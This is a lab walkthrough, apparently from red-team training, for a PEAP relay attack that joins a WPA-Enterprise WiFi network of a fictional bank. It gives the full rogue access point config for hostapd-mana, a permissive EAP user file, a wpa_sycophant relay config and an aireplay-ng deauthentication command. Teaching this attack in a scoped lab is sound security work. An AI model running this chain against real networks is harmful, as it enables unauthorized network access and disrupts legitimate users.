PEAP Relay

Pivoting over WiFi: PEAP Relay

Your Red Team is hired by Global Central Bank to test the security of their HQ. You are given the responsibility of assessing their WiFi network. The WiFi network might lead to the machines on their private LAN. Everything else is off-limits.

The network settings enforce the user to use PEAP-MSCHAPv2 with very strong passwords. Hence, a successful MSCHAPv2 cracking attack is not feasible. However, one can use the PEAP relay attack to connect to the network

// Set the wireless device into monitor mode
iw dev wlan0 set monitor none

Create a mana config file like the one below. Note: for this lab the certificates were already generated.

interface=wlan0
ssid=GlobalCentralBank
channel=6
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1
enable_mana=1
enable_sycophant=1
sycophant_dir=/tmp

You also need to create the hostapd.eap_user file as per below. This will allow any user to connect.

* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP
"1234test" [2]

Start mana with the config file

hostapd-mana hostapd-mana.conf

Create the Sycophant config file as per below and then start Sycophant by running:

./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan1

network={
ssid="GlobalCentralBank"
# The SSID you would like to relay and authenticate against.
scan_ssid=1
key_mgmt=WPA-EAP
# Do not modify
identity=""
anonymous_identity=""
password=""
# This initialises the variables for me.
# -------------
eap=PEAP
phase1="crypto_binding=0 peaplabel=0"
phase2="auth=MSCHAPV2"
# Dont want to connect back to ourselves,
# so add your rogue BSSID here.
bssid_blacklist=02:00:00:00:00:00
}

Use aireplay-ng to deauth the client:

aireplay-ng -0 100 -a D2:E9:6A:D3:B3:50 -c 02:00:00:00:09:00 wlan2

In the hostapd logs, you can see the client connecting:

Viewing the sycophant logs, you can see the connection being relayed and then connecting to the network. Sycophant will also run dhclient to obtain an IP address.